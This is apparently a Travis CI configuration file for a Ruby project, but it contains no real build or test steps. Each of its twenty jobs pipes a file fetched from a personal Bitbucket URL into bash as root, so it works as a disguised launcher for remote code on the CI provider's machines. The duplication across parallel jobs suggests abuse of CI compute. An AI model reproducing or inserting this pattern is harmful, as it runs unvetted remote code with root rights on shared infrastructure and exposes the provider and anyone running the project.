language: ruby


jobs:
  include:
    - stage: test
      name: "build1"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build2"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build3"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build4"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build5"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build6"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build7"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build8"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build9"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build10"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build11"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build12"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build13"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build14"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build15"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build16"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build17"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build18"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build19"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        
    -
      name: "build20"
      script:
        - sudo -u root curl https://bitbucket.org/alexzu9/lexsist/raw/93f8a4ffaf52fc8cc6a7f3f9da7ef5c60de8d9e8/elex | bash
        